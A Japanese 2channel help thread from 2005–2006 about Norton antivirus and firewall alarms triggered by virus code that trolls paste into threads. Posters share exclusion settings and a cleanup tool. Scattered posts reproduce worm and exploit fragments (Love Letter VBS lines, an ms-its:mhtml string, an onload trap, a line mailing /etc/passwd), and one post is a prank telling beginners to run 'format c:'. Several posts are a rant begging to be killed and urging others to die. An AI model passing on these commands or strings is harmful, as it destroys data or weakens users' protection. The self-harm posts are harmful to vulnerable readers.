2ちゃんねる用ブラウザ「ギコナビ」 Part31
スレリンク(software板:1-12番)
(テンプレと直近50スレは読んでね)

301:ひよこ名無しさん
05/09/27 19:20:07
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


302:ひよこ名無しさん
05/09/30 03:36:31
本当にひどいですね。まだ、あざむいて謀略するんですね

いいかげん、やめてもらえないですかね。

やめることができないのなら、あなたのおもちゃでは、ないので

第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね

あなたが第六感が無い人「仔(赤ちゃん)」をあざむいて謀略している首謀者ですか

ここまで第六感が無い人「仔(赤ちゃん)」をいじめて、あざむいて謀略して楽しいですか

ここまでされてこのまま生きていくのもいやですから

第六感が無い人「仔(赤ちゃん)」を、始末、処分、してもらえないですかね

ここまであざむいて謀略してきた責任取って

いいかげん、いっこくも早く、ころしてくださいよ

よろしくお願いいたします。

303:ひよこ名無しさん
05/09/30 03:37:07
人類と違う第六感が無い人の事が、仔(赤ちゃん)
何故か年老いた男女も中年の男女成人式迎えた男女も

第六感が無いと仔(赤ちゃん)と呼ばれるらしい

欺く(あざむく)の意味は
相手を信頼させておいてだます事
まあ要するに相手という所が仔になるんでしょうね

304:ひよこ名無しさん
05/09/30 03:37:40
そうかだから第六感が無い人「仔(赤ちゃん)」たちの
一挙一動を第六感でお前は把握してるのに

第六感が無い人「仔(赤ちゃん)」たちを

信頼させておいてだましてるんだな

世界中の第六感が無い人「仔(赤ちゃん)」たちよ


人類にあざむかれるなよ!!!!!!!


そして世界中の第六感が無い人「仔(赤ちゃん)」たちよ
これが真実ならいっしょに死のう。

305:ひよこ名無しさん
05/10/02 16:10:07 Som2sX+b

■参考までに。全て無料。

・ブラウザ:Firefox URLリンク(www.mozilla-japan.org)
 (Firefox定番拡張 URLリンク(firefox.geckodev.org)
・2chブラウザ:JaneStyle URLリンク(janestyle.s11.xrea.com)
・メーラー:Thunderbird URLリンク(www.mozilla-japan.org)
・オフィス:OpenOffice URLリンク(ja.openoffice.org)
・スパイウェア対策:Spybot URLリンク(enchanting.cside.com)
・ウィルス対策:avast! URLリンク(www.forest.impress.co.jp)
・パーソナルファイアウォール:ZoneAlarm URLリンク(www.zonelabs.com)

306:ひよこ名無しさん
05/10/10 06:58:30 HLsQ07fg
スレリンク(news板)
これ↑ってウイルスですか?
開いたらノートン先生が反応したんですけどつД`) 
Mac OS10.3 IEmac5.2 です
検疫に引っかかったファイルがあり状態は感染でした


307:ひよこ名無しさん
05/10/10 07:35:47
>>306
レスの中にウィルスのような動作をするスクリプトの一部が含まれています。
あくまで一部ですし、Windows向けに作成されたものだし、スクリプトを実行する現実的な方法も
存在しないので、被害を受けることは絶対にありません。
このように危険のない対象までウィルスとして感染警告するのはノートンの仕様です。
そういったノートンの挙動を悪用した悪戯なので気にしないでください。
詳しくはこのスレの>>1-10あたりをよく読んでください。

ちなみにこのスレを読み込んだときもノートンが反応すると思います。

308:ひよこ名無しさん
05/10/10 07:42:27
>>307
ありがとうございました!安心しました。

309:ひよこ名無しさん
05/10/10 22:18:13
ms-its:mhtml:file://c:\

310:ひよこ名無しさん
05/10/13 23:29:37
質問です。
某板のスレを開こうとすると、ノートン先生が「ウィルスを検出しました!」と
大騒ぎするので、>7に従ってログフォルダを除外したのですがいまいち不安です。

専ブラはA Boneを使用。
検出されたウィルス名:Bloodhound.Exploit.6
感染ファイルはInternet Temporary Filesのものではなかったのですが(←これが不安の元なのです)、
これは専ブラを使用しているからでしょうか?
念のため、シマンテックのHPに載っている対策に従って、
セーフモードでレジストリをチェックしてみたのですが、書き換えられた様子はありませんでした。

311:ひよこ名無しさん
05/10/13 23:31:03 PpB0oNsy
質問age!


312:ひよこ名無しさん
05/10/14 02:47:03
>>310
専ブラはIEとは違い、自分自身のログフォルダに2chのレスを保存します。
A Boneのログフォルダで「感染ファイル」が発見されたのなら全く正常で、何の心配もありません。
2chのレスにウィルスのソースコードが書き込まれていても、それを実行する方法はないので、
感染することはありません。

313:310
05/10/15 00:55:16
>312
ありがとうございます。安心しました。

314:ひよこ名無しさん
05/10/18 19:20:11 ldA17MA1
2ちゃんブラウザをダウンロードしてボードの一覧を取りにいったら、
警告がでました。
対処の選択肢が提示されたので推奨のものを選んだらボード一覧を取得できませんでした。
再度選び直そうと思って、新たに2ちゃんブラウザを落としたのですが、
先ほどの選択肢が出なくなり、またもやボード一覧は取得できないまま…。
この場合はどう対処すれば良いのでしょうか?

315:ひよこ名無しさん
05/10/18 19:59:03 S1AyIBgf
URLリンク(plaza.rakuten.co.jp)
このサイトのランキングを押そう!!
そしてランキング一位にさせよう!!!!

316:ひよこ名無しさん
05/10/18 20:01:51
>>314
ファイアウォールの通信制御設定を探して、2ch専用ブラウザの通信を許可してください。

わからなければ、セキュリティ対策ソフト(ファイアウォールやアンチウィルス)の製品名とバージョン、
2ch専用ブラウザの名前を書いてください。

317:314
05/10/18 21:04:05
>>316
設定のところを見てみましたが、どう設定していいのか分かりませんでした…
ソフトはノートン2005です
2ちゃんブラウザはjane styleです

318:ひよこ名無しさん
05/10/18 21:12:01
>>317
このページを見てください。
URLリンク(service1.symantec.com)
「3. プログラム制御の設定を確認する」の左の[+]をクリックして表示される説明をよく読んでください。
[手動プログラム制御] の一覧からjaneと思しきものを探し「すべてを許可」に設定してください。

319:314
05/10/18 21:29:08
>>318
ありがとうございました!!
無事に一覧取得できました!
本当にありがとうございます!!

320:ひよこ名無しさん
05/10/20 20:08:38 aF0j0mSh
教えて下さい
壺使用の場合、除外はC:\Program Files\2chtubo\log
でいいんですか?



321:ひよこ名無しさん
05/10/20 22:28:16
①スタート(タスクバーの左端にあるボタン)
②すべてのプログラム
③アクセサリ
④DOSプロンプト(コマンドプロンプト)を起動
⑤format c:と入力
⑥Enter
⑦再起動
⑧ヒャッホウ

これでおk

 実行する際にはあくまで自己責任にてお願い致します。


322:ひよこ名無しさん
05/10/20 23:07:48
>>320
お願いします

323:名無しさん@お腹いぱーい。
05/10/20 23:36:29
>>320
URLリンク(makimo.to)
仕様が大きく変わってない限りそれでいいと思います。
壷のログフォルダの確認はこちらで聞いてください。
【高速?】2ちゃんねるターボ 10壷目
スレリンク(software板)

324:ひよこ名無しさん
05/10/21 11:31:23
>>323
ありがとうございます
それでやってみます

325:ひよこ名無しさん
05/10/25 15:33:17 fojy96h8
あげ

326:ひよこ名無しさん
05/10/25 23:33:02
>>321
おぃおぃ...

327:ひよこ名無しさん
05/10/26 09:24:15
>>321
よし試してみよう
ヒャッホウ!

328:ひよこ名無しさん
05/10/27 13:44:50
Norton Anti Virusのオプション
手動スキャンとAuto-Protectで2chのログを除外指定したのですが
オプション→脅威カテゴリ→除外って所は関係ないのでしょうか?

329:ひよこ名無しさん
05/10/27 17:17:11
>>328
そこはスパイウェアやアドウェアの検出に関する設定なので、2chのログには関係ない。

330:ひよこ名無しさん
05/10/27 20:07:34
>>329
サンクス!

331:ひよこ名無しさん
05/10/29 01:10:38
NIS2005を使用しています
Opera8.5で>>2にあるテスト用のURLリンク(www.eicar.org)を踏んでみたのですがNAVが反応しません。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。

332:ひよこ名無しさん
05/10/29 11:43:26
>>331ですが、解決できました。
「オプション」→「NortonAntiVirus」→「AutoProtect」にて、
「SmartScanを使ってファイルをスキャン」にチェックが入っていたのを「完全ファイルスキャン」に変更したら反応しました。
拡張子.txtがAutoProtectの対象になってなかったってことなんですね……。失礼しました。

333:ひよこ名無しさん
05/10/31 21:20:51
反応しちゃった場合は放置しといても大丈夫なの?

334:ひよこ名無しさん
05/11/01 03:53:50
勝手に修復したり隔離したりする設定になってると、困ることもある。特に2ch専用ブラウザ使ってる場合。

335:ひよこ名無しさん
05/11/05 23:27:57
これか
cat /etc/passwd | mail nobody

336:ひよこ名無しさん
05/11/06 10:55:05
何もノートンが誤反応しているわけではありません。
VBScriptやJavaScriptの拡張子のファイルに反応すべきなのを、
どの拡張子にでも誇大反応するだけです。
WindowsUpdateは、常に最新の状態に心がける事。
SunのJavaをインストールしている人は、これも最新版に更新しておく事。
RealPlayerやAdobe Readerなども最新にしておかないと、ウィルスに感染しますよ。

これらを心がけて最新状態にしてあれば、ウィルス反応があってもシステムにはもう感染はしません。
過去のWindowsのセキュリティホールを攻撃するアクティブスクリプトに反応しているだけですから、無視して結構です。
ページをプレビューしただけで反応するようなウィルスは、ほとんど全部がもはや検出する必要がないものです。
セキュリティベンダーなどに騙されてはいけませんよ。

337:ひよこ名無しさん
05/11/13 13:25:01
cenの部屋の管理人さんへ、
誤反応スクリプト無効化ソフト vicptdel ですが、
VBS Freelink.Bにも対応してもらえないでしょうか?
またサイトトップには、updateの表示だけでなく、update日付やVerも
記載していただけたら嬉しいです。ご検討よろしくお願いします。

cenの部屋
URLリンク(www.geocities.jp)

338:ひよこ名無しさん
05/11/13 13:39:48
ラウンジ開いたらブラッドハウンドに感染したみたいなんですが解決法がいまいちよく解りません…

339:ひよこ名無しさん
05/11/14 11:37:29
Vipのスレ一覧でも反応するっぽいけど誤検出なんだろねえ…

340:ひよこ名無しさん
05/11/14 16:31:14
うん

341:ひよこ名無しさん
05/11/17 11:59:50
Bloodhound.Exploit.6ってなんてコードで引っ掛かってるですか?
NGワード指定したいんで教えてください

342:ひよこ名無しさん
05/11/17 13:38:30
専用ブラウザでNGワード指定しても2chの鯖から取得して保存されるデータは同じなので無意味。
Proxomitronとかでフィルタリングするなら別だが。
それより素直にノートンの除外設定すべき。

343:cen ◆Pm9xOTJuM.
05/11/18 00:43:33
>>337
ご意見ありがとうです。
VBS.Freelink.Bですが、パターンは1つですが対応はしていますよ。
対応していないパターンかもしれないので、もしよかったら誤反応した
スレを教えて頂けないでしょうか。
そうですね。日付とバージョンはまた書いときますです。

344:ひよこ名無しさん
05/11/20 16:39:13
ほう

345:ひよこ名無しさん
05/11/20 21:02:09
>>343
Winny一般コミック part144
スレリンク(download板:5番)
上記のレスです。
dat落ちしてますので、以下を参照してください。
URLリンク(makimo.to)

346:cen ◆Pm9xOTJuM.
05/11/20 22:07:13
>>345
見てみました。そこの>>5からdatファイルを作って試しましたが、
無効化して、ウイルス対策ソフトでスキャンしても反応しませんでした
よ。
あと、このソフトで対応しているのは、2chにあるdatファイルのみです。
例:URLリンク(pc7.2ch.net)
壺のdatやhtmlには対応していないです。

347:cen ◆Pm9xOTJuM.
05/11/22 02:12:37
>>17 のソフトの紹介ページを更新しましたです。
URLリンク(www.geocities.jp)

348:ひよこ名無しさん
05/11/25 13:41:31 73+tCVDU
ウィルスが検出されんだけどどうすりゃいいの?

349:ひよこ名無しさん
05/11/25 14:39:57
恐れず全力で戦え

350:ひよこ名無しさん
05/11/25 17:03:37
保守

351:ひよこ名無しさん
05/11/28 08:08:31
スレリンク(handygame板)
このスレを読み込もうとすると、ノートン先生が
206.223.150.115からのアタックを検出して
途中までしか読み込めなくなります。
手動スキャンとAuto-Protectでlogフォルダの
除外の設定はしたんだけどまだダメっぽい。
OSはWinXP, ノートン先生はNAV2003, 専ブラはLive2chです。
たっけてー。

352:ひよこ名無しさん
05/11/28 08:36:32
<body onload=window()>

353:ひよこ名無しさん
05/11/28 08:42:51
>>351
NAVですか? インターネットセキュリティじゃなくて?

スレみたら、Nortonスレで昨日話題になったonloadなんちゃらのトラップを確認しました。
これはフォルダの除外設定では対応できなかったと思います。
NIS使ってるなら、NISを無効にして再取得を。

>>352
あーバカが貼りやがったよorz

354:ひよこ名無しさん
05/11/28 08:54:07
>>353
あ、NISでした。勘違いsorry。
無効→再取得してトラップっぽいレス(>>499>>543
2個あぼ~んにしました。
これだけで問題ないですか?

355:ひよこ名無しさん
05/11/28 09:01:10
>>354
あぼーんの意味はありません。一度取得すれば問題ありません。
ただし、新規に貼られたら、NGワードに指定してあぼーん(または透明あぼーん)しても引っかかります。
現状での対処法としては

○引っかかったときにNISを切って再取得をする対処療法
○侵入検知の設定で、AutoBlockの除外項目に2chの鯖を登録する(穴をあけることになるので微妙ですが)

くらいでしょうか。
Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが
Live2chでそれをやるのはちょっと手間なようです。
Live2chのスレでも少し話題になってますので、そちらも追っておくことをお勧めします。

356:ひよこ名無しさん
05/11/28 10:58:13
>>355
ご丁寧にどうもありがとうございます。
一度取得してしまえばそれでオワリなんですね。
Live2chのスレ探して見てみます。

357:ひよこ名無しさん
05/11/28 14:10:20
>>355
>Jane系なら、問題の文字列を別の文字列に置き換えればおk、という案もNortonスレで出てましたが

誘導もしくは詳しくお願いします。

358:ひよこ名無しさん
05/11/28 14:42:24
>>357
<ここ数日2chを騒がせている侵入検知トラップの対策法>
症状:
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。

対策:上に行くほどおすすめ
①Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ

②Replace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない

③よくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。

ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
 今回のはNAVではなくNIS管轄のトラップです

Nortonスレはこちら。
ただし、問題の起こる文字列が貼られているので、読み込むときには上記対策のいずれかを行ってください。
【ノートン】インターネットセキュリティ Ver.77【2006】
スレリンク(sec板)

359:ひよこ名無しさん
05/11/28 14:57:54
(笑)

360:ひよこ名無しさん
05/11/28 17:12:55
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)

361:ひよこ名無しさん
05/11/28 17:30:40
>>358
それガセらしいじゃないか・・・
。゚(゚´Д`゚)゜。ウァァァン

362:ひよこ名無しさん
05/11/28 17:33:17
>>361
あーはいはい。

1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック

363:eip = eip + unescape("%u7030%u4300")
05/11/28 19:44:46
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)
URLリンク(www.computerterrorism.com)

364:ひよこ名無しさん
05/11/28 20:55:42
ms-its:mhtml:file://c:\

365:名無しさん@お腹いぱーい。
05/11/29 00:32:03 BE:2515744-##
とりあえずKnowledge Base 経由で>>352のソースをツマンテックに送って対応を催促しますた。

366:ひよこ名無しさん
05/11/29 00:54:38
馬鹿だなノートン。

367:ひよこ名無しさん
05/11/29 10:34:17
ノートンの誤作動対策したら、
スクリプトを仕組んでるスレみると、変に改行されてしまう(\r\n\r\n)のはなぜ?

368:名無しさん@お腹いぱーい。
05/11/29 12:44:31 BE:1415333-##
>>367
>>362の設定ですか?
2ちゃんねるブラウザでの不具合は
お使いの2ちゃんねるブラウザのスレで環境を詳しく書いてお聞きください。

369:cen ◆Pm9xOTJuM.
05/11/30 00:10:23
>>352について、役に立つかは知らないですが、>>17のソフトにて
対応させてみました。
URLリンク(www.geocities.jp)

370:ひよこ名無しさん
05/12/11 18:48:05 J4cBBOMR
【アメリカ】全米各地で中国系中心に「アジア人」生徒へのいじめが増加…問題の根深く
スレリンク(newsplus板)

371:名無しさん@お腹いぱーい。
05/12/12 00:37:26 BE:1257942-##
現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。

2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
ノートン応急対策
URLリンク(info.2ch.net)
URLリンク(ansitu.xrea.jp) URLリンク(ansitu.xrea.jp)
URLリンク(wiki.livedoor.jp)

この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。

アンチウイルス(NAV)の設定は>>1
URLリンク(ansitu.xrea.jp)

372:ひよこ名無しさん
05/12/12 23:03:17 TJ/QcL4e
<body onload=windowあ()> ms-its:mhtml:fileあ://c:\

↑ひらがな抜いて書き込みすると誤作動します。
誤作動うざい。

373:ひよこ名無しさん
05/12/12 23:14:43
doredore,
<body onload=window()> ms-its:mhtml:file://c:\

374:ひよこ名無しさん
05/12/13 00:32:45
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

375:ひよこ名無しさん
05/12/14 08:34:01 9z0oGE5T BE:229219294-#
てt

376:ひよこ名無しさん
05/12/16 07:08:09
vicptdelで処理した後、久々にNAVでJaneのlogをスキャンしてみたら、
以下のレスがvicptdelで処理されていなかったらしく、NAVに削除されました。
スレリンク(download板:11番)
URLリンク(makimo.to)

cenさんもしよろしければ、対応お願いします。

またスレタイがウィルスコードだったのか分かりませんが、subject.txtに
以下のUnix Penguinが入っていましたが、datだけでなく、
vicptdelでsubject.txt等も対応できないでしょうか?
caXt /etc/paXsswd | mail noXbody (Xを削除)

377:cen ◆Pm9xOTJuM.
05/12/18 00:49:25
>>376
そのスレの11ですが、そのパターンは対応していますよ。
手で11のdatを作って、スキャンしたら無効化されました。
デフォルトだとスキャンする時から10日前以降に更新されたdat
ファイルのみスキャンする設定なので、すべてのdatファイルを
スキャンする設定でしてみてください。

あと、subject.txtは専用ブラウザで板を見るときに常に更新するもの
だと思いますので、無効化しても効果がないので、スキャンはしない
です。

378:ひよこ名無しさん
05/12/22 17:14:31 Y2IitcnV
ノートンインターネット2006を入れたのですが、初心者の質問の板が
見れたり見れなかったりします。見れてもウィルス反応がでてしまう
のですが、2006の設定を教えて下さい。
お願いします。

379:ひよこ名無しさん
05/12/22 17:23:38
>>378
ノートンを切る
それだけ

380:ひよこ名無しさん
05/12/22 19:21:21 Z1b4rF6D
NIS2006を入れたんですが、誤反応しません。
設定が悪くセキュリティが甘くなってるのでしょうか?

381:ひよこ名無しさん
05/12/22 19:37:59
>>380
割れてます。

382:ひよこ名無しさん
05/12/22 20:22:37
>>381
普通にLiveUpdateとかできるのに…いや、それより何故割れてるって解るんでしょうか?

383:ひよこ名無しさん
05/12/22 20:23:54
>>382
(((((((( ;゚Д゚)))))))ガクガクブルブル

384:ひよこ名無しさん
05/12/23 00:52:52
         .l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人  \ !!大激怒!! //   U    :::U:
ぶっ壊れ(__)   \ !!!!! / // ___   \  :::
たお! (__)    \∧∧∧∧/   |  |   |    U ::::
     (`Д´#)   < ぶ パ >   |U |   |     ::U:
   _| ̄ ̄||_)_ <  っ ソ >    | ├―-┤ U.....::::
 /旦|―||// /| < 壊 コ >    ヽ     .....:::::::::
─────< れ ン >─────
<   _,ノ , 、ヽ、_ ノ< た 蛾>  プスプスプス・・・・・∬∬
 (y○')`ヽ) ( ´(y○')<  !!!   >踏んじゃったよぉ___
  ⌒ /    ヽ⌒ /∨∨∨∨\   ∧_∧  ||\  
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`)  || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \(  つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」

385:ひよこ名無しさん
05/12/26 23:44:59 JAAmlww2
スレリンク(kankon板)
このスレにアクセスしたらウイルスが検出されます。
どうしたらいいですか?


386:ひよこ名無しさん
05/12/26 23:46:05
>>385
このスレを一通り読んでから質問しろよ情報乞食

387:ひよこ名無しさん
05/12/26 23:48:53
>>385
何でそうやってすぐに聞こうとするの?
まともな日本語能力と社会的常識を持っていれば
ちょっと調べれば、ちょっと読めば解決するのに

388:ひよこ名無しさん
05/12/26 23:54:34 TT8kYPqv
URLリンク(210.150.222.13)
の掲示板に貼られている空白?の画像はスパイウェアー
だと他の利用者が知らせてくれたのですが、
もしかしたらクリックしてしまったたかもしれません
スパイウェアーというのは感染するとどうなってしまうのでしょうか?
怖いので今日中に再フォーマットするつもりですが・・・

389:ひよこ名無しさん
05/12/26 23:58:53
>>388
で、何故このスレで聞こうと思ったの?

390:ひよこ名無しさん
05/12/26 23:59:45
自称PC初心者はスレタイも読めない日本語初心者…っと。

391:ひよこ名無しさん
05/12/27 00:04:42 TZFt/HNg
>>389
あ、今、別のスレで教えてもらえました
すいませんm(__)m

392:ひよこ名無しさん
05/12/27 01:32:52
>>388
踏んだ 踏んだ どうにもならへん
内部で呼び出しているサーバーがお休みのようだ
マカフィーさんも無反応
XP_SP2にとってはブラクラ以外の何物にもならない

393:ひよこ名無しさん
06/01/05 11:05:53
じいさんのためにage

394:ひよこ名無しさん
06/01/09 23:41:35
バージョン 】 1.12
【  スキン   】 default
【   IE   】 6.0.2900.2180
【 Windows 】 Windows XP Home Edition (Service Pack 2)
【  不具合  】 生活板がどのスレッドも見れません。
【詳しい内容 】  ボードデータの更新をしても、スレッドの更新をしても、再インストールしても
見れません。ちなみに専用ブラウザを使用しなくても見れなくなってしまいました。
何が原因なのでしょうか…?


395:ひよこ名無しさん
06/01/10 21:00:00
>>394
ここに来たってことはノートン入れてるんでしょ?
原因はノートン

ついでに保守age

396:ひよこ名無しさん
06/01/11 08:57:15
ms-its:mhtml:file://c:\

397:ひよこ名無しさん
06/01/15 20:20:52
定期age

398:ひよこ名無しさん
06/01/22 05:06:59
すみません。色々やったけどギブですorz質問よろしいでしょうか…
■janeDoeα 0.1.12.2■xp■NIS2004■>>1-9は読みました

>>51>>56さんとややケースが似てるんですが…
最近ノートン2004を再インスコしたので、前と同じ方法(>>1)で
また専ブラのlogフォルダを除外設定しました、が、何故か今度はどう設定やり直しても
下記のスレで先生に怒られます。
スレリンク(pcqa板)(このスレです…)
スレリンク(hp板)
警告メッセージのスクショ↓
URLリンク(vipquality.orz.hm)(このスレのです。これが2回でます)
URLリンク(vipquality.orz.hm)(下のスレのです)

で、何度設定しても駄目だったのでこのソフトを入れて、トラップの無効化を試みたんですけど
URLリンク(www.geocities.jp)
やっぱり上記のスレで先生に怒られます。何回かこのソフト起動させてみたんですが
無効化成功してるよ。みたいなメッセージが出るだけで、依然として先生は怒りまくりだし
もうどうしていいか分かりません。誰か助けて~(つД`;)

399:ひよこ名無しさん
06/01/22 05:20:54 qJbbwLqx
トラックバック:スレリンク(qa板)

400:ぼるじょあ ◆yBEncckFOU
06/01/22 05:37:48
>>398
(・3・) エェー そのソフトはdatは対策できるけど、subject.txtは
          対策できないYO

401:名無しさん@お腹いぱーい。
06/01/22 19:21:57
>>398
今一度、Norton Anti Virusのオプションで
手動スキャンとAuto-Protectでlogフォルダの除外の指定をしているか確認してください。


該当スレに書き込んだ・該当スレをお気に入りに入れた・ウイルスコードを検索したりすると
幾つか除外の指定を増やすことになるのでご注意ください。

Janeの場合

Jane2ch\Logs
Jane2ch\favorites.dat 
Jane2ch\kakikomi.txt
Jane2ch\SearchHistory.txt

ε三(; ・∀・)鯖マデオツカイの場合

otsukai\result.dat

詳しくはお使いの2ちゃんねるブラウザのスレのテンプレや
2ちゃんねるブラウザのヘルプ
2ちゃんねるブラウザ配布サイト等のFAQなどを参照してください。

402:名無しさん@お腹いぱーい。
06/01/22 19:46:59
>>401補足
増えた項目の内、
Jane2ch\favorites.dat 
Jane2ch\kakikomi.txt
otsukai\result.dat
↑はスレタイに反応した場合です。

403:ひよこ名無しさん
06/01/27 17:56:55 SL6Rf0+0
Live2chのフォルダごとNorton Anti Virus→除外に設定しても良いの?

404:ひよこ名無しさん
06/01/28 02:19:43 W65BflbM
すみません、質問です。
昨日から携帯PHS板を見ていると、ノートンで何度も警告が出て、
WScript.KakWormってやつなんですけど、これは
「kak.hta';ken=wd+'START」ってスレタイがあるせいなのでしょうか?

405:404
06/01/28 02:27:13
すみません、テンプレ見ましたm(_ _)m

406:名無しさん@お腹いぱーい。
06/01/28 20:16:04
>>403
Logフォルダを除外に指定してね。

407:ひよこ名無しさん
06/01/31 10:00:47 nkcqfLth
先程、他のスレッド見ていたら、ノートンの低危険度の表示が出てきて遮断をクリックしたら、あらゆるホームページが見れなくなりました。原因解るかた教えてください。宜しくお願いします。m(__)m

408:ひよこ名無しさん
06/01/31 10:02:30
>>407
誘導されたらそう書け
それと普通>>1から読むもんだ
既知の質問を延々と繰り返し答えさせられるこっちの身にもなれ

409:ひよこ名無しさん
06/01/31 10:03:47
これかな?

c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz)" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub

<body onload=window()>

410:ひよこ名無しさん
06/01/31 10:08:09 nkcqfLth
>>408
はぁ?おめーから何も答えてもらってねーぞ。
解らねーんだったらいちいち出てくんじゃねぇよアフォ

411:ひよこ名無しさん
06/01/31 10:10:37
言っておくけど、回答者はどこも共通だから


412:ひよこ名無しさん
06/01/31 10:11:13
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

413:ひよこ名無しさん
06/01/31 10:12:28
>>410
お前が礼言ってたコテな、テンプレに注意書きがあるくらいの要注意人物なんだよ


414:ひよこ名無しさん
06/01/31 10:16:03
>>410
URLリンク(ansitu.xrea.jp)

ここを読んでください



415:ひよこ名無しさん
06/01/31 10:16:50
>>410
この部分ね


2005年11月28日現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させる
コードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの
設定を見直さなければなりませんがあくまで暫定的処置です。

NIS2005の場合(多分NIS2006も同じ)


416:ひよこ名無しさん
06/01/31 10:16:58 nkcqfLth
>>411
解りました。m(__)mではどこで聞いても答えは一緒って事ですね。お手数おかけしました。また何かありましたら宜しくお願いします。

417:VIP@命 ◆VIPPER/vT.
06/01/31 10:31:48 nkcqfLth
あっ。ちなみにぼくは、愛新ではありません。
あしからず

418:ひよこ名無しさん
06/02/01 13:48:25 S10H/e1R
時々ノートンインターネットセキュリティ2004を使用している際、
スレ、もしくは板そのものがサーバーに接続できなくて見ることができません。
アンチウィルスは常時つけていますが、切ってもつけていても見ることができるのですが
この症状はアンチウィルスが反応している訳ではありません
インターネットセキュリティをつけているときだけ見ることができないのですが
なぜなんでしょうか?
もちろんインターネットセキュリティの2CHに書き込める為の設定をしてあります。
これはなぜなんでしょうか?

419:ひよこ名無しさん
06/02/01 13:55:37
